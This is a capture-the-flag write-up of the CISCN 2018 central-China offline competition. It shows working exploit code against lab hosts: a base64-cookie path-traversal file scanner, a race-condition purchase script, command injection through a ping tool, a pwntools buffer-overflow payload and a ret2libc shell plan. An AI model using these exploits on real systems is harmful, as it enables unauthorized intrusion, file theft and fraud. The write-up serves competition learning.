ciscn2018 华中区线下赛writeup

6月2号-3号在华中科技大学的线下赛。
第二天开始的时候排名如下(写这篇wp的时候总成绩还没出来):


第一天比赛完后,草草写了篇wp,记录下。

Q03

使用burpsuite抓包浏览网页

发现在个别页面有名称为“uuid”的cookie。

解码后发现是文件名。

怀疑有遍历文件漏洞。

可以下载整个网站源码。

构造脚本,扫描flag。

"""
GET /captcha HTTP/1.1
Host: 172.16.9.13
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.9.13/login
Cookie: _xsrf=2|6704a712|711af8829da9963a3cf02d347fc186e2|1527916860; uuid="Li4vLi4vLi4vbWFpbi5weQ=="
Connection: close
"""
ko = """flag
FLAG
fl4g
f14g
hint
README
readme"""
follow = """.py
.txt
.md
.sh
"""
dic = """home/ciscn
home/ciscn/sshop
home/ciscn/sshop/views
home/ciscn/sshop/templates
home/ciscn/sshop/templates/flag
root
etc
tmp
"""
import requests
url = "http://172.16.9.13/captcha"
def check(source):
    source = "../../../../../" + source
    header = {
        "Cookie": 'uuid="%s"' % source.encode("base64")[:-1]}
    res = requests.get(url, headers=header)
    if "Traceback" in res.text:
        # print res.text.split("\n")[-2:-1][0].replace("/home/ciscn/sshop/captcha/jpgs/../../../../../", '/')
        return
    print source
    print res.content
    return
    # open("sshop.db3","wb").write(res.content)

for d in dic.split('\n'):
    for n in ko.split('\n'):
        for f in follow.split('\n'):
            check(d + '/' + n + f)

最终获得flag,路径为/etc/flag

Q08

http://172.16.9.18

邮箱密码找回漏洞。

在info路径下输入错误的id,发现开启了debug,可以获得返回页面中字段init_admin_email,得到邮箱后,重置邮箱密码。

使用admin帐号登录后,购买一个物品,发现有提示,当使购买的物品数量大于库存。

所以写了个竞态脚本,如下:

import requests
import multiprocessing
headers = {
    "Cookie": "csrftoken=EG37B7EkFla2QgugpCaL4b5VmsrPvouUzes5sQOmsRB6Uid3U08s1GuJ91GUlUUc; sessionid=9kddlr4d90825fwnhgndwjyjtym2xpdr",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
}

url = "http://172.16.9.18/pay"
payload = {"csrfmiddlewaretoken": "3tgD8mis6rTETiaq9rMZesD3rHcnSXsJY1FBZ5suTXkIXkTdEPKGbX2RegrsItS1",
           "id": 99,
           "price": 0.1}



for i in range(900):
    for j in range(3):
        t = multiprocessing.Process(target=requests.post, kwargs={"url":url,"data":payload, "headers":headers})
        t.start()
    t.join()


    # req = requests.post(url=url,data=payload, headers=headers)
    # print(req.text)

购买成功后,出一个提示,大概内容是static/{0h_y0u_f1n411y_g0t_m3,backup.sql}

里面是10000个密码,使用这个字典暴破django后台,密码最终为:

Wh05y0urd4ddy2333

使用admin+这个密码登录后,在后台发现flag:

Congratulations! CISCN{be30f23e-5b56-4e4e-9329-54d5e08b6c32}

Q10

http://172.16.9.21/9aysh0p/

根据源码提示,得到/9aysh0p/这个目录

于是访问它,是一个商城系统。

根据hint1,扫描最底下的二维码,得到以下信息:

plz contact the administrator <0.0>;
kvzrx-tlelx-arevq-mvzlx-tlerx-areny-tlevx-mbevy-slebx-ahenx-thany-zvely-orcly-onkbk

Color egg:Babble is 13 years old this year!

中间是rot13+BubbleBabble加密,

先解rot13,解出来是ximek-gyryk-nerid-zimyk-gyrek-neral-gyrik-zoril-fyrok-nurak-gunal-miryl-bepyl-baxox

再解BubbleBabble,代码如下:

from bubblepy import BubbleBabble


print (bb.decode("ximek-gyryk-nerid-zimyk-gyrek-neral-gyrik-zoril-fyrok-nurak-gunal-miryl-bepyl-baxox"))

结果:

b'admin/admintools/index.php'

访问这个页面,发现是一个登录页面,访问后需要admin帐号登录,扫描一下,发现有admin/admintools/tools/',访问后有ping工具,怀疑可以执行shell。fuzz后,发现可以执行payload。

0.0.0.0&ls

发现列出了一堆文件。

访问第一个txt文件即为flag

pwn_p

  • 输入666进入secret_code。
  • 输入327a6c4304ad5938eaf0efb6cc3e53dc+"\0" *0x20+"./"*16+"flag"进行溢出,覆盖调用cat_file调用变量。
  • 再输入非[1,4]的任意数值执行cat_file函数
from pwn import *

import time

#io = process("./pwn")

io = remote('172.16.9.24', 1337)
payload = '666'
io.sendline(payload)

io.recvuntil("Please enter your password:")

payload2 = '327a6c4304ad5938eaf0efb6cc3e53dc'+'\0'*0x20+'./'*16+'flag'
io.sendline(payload2)

io.recvuntil("4) File_Flag")
io.sendline('10')

io.interactive()

pwn_n

1.漏洞点

漏洞点如下图所示,gets正常情况下最多可以输入0x1c个字符,但是gets没有做限制,并且程序没有栈保护,所以可以通过栈溢出覆盖返回地址进行攻击。

2.泄露puts函数地址计算system函数和"/bin/sh"地址

​ 第一次栈溢出,覆盖返回地址为puts函数的plt地址,并且将puts的got表地址做为参数传递,通过次方法可以泄露出puts函数运行时的地址,然后通过查询libc数据库可以知道服务器上运行的是哪个版本的libc,然后获取system和“/bin/sh”与puts函数的偏移,最终计算出system和”/bin/sh”的运行时地址。

3.栈溢出覆盖返回地址执行system("/bin/sh")

​ 第二次栈溢出,覆盖返回地址为system函数,参数传递为“/bin/sh”的地址,这样就可以成功拿到shell,读取flag。

赛后感想

感受到其他赛区出题人深深的恶意。好多web题目都做出来一半,就找不到切入点了。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,456评论 5 477
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,370评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,337评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,583评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,596评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,572评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,936评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,595评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,850评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,601评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,685评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,371评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,951评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,934评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,167评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 43,636评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,411评论 2 342

推荐阅读更多精彩内容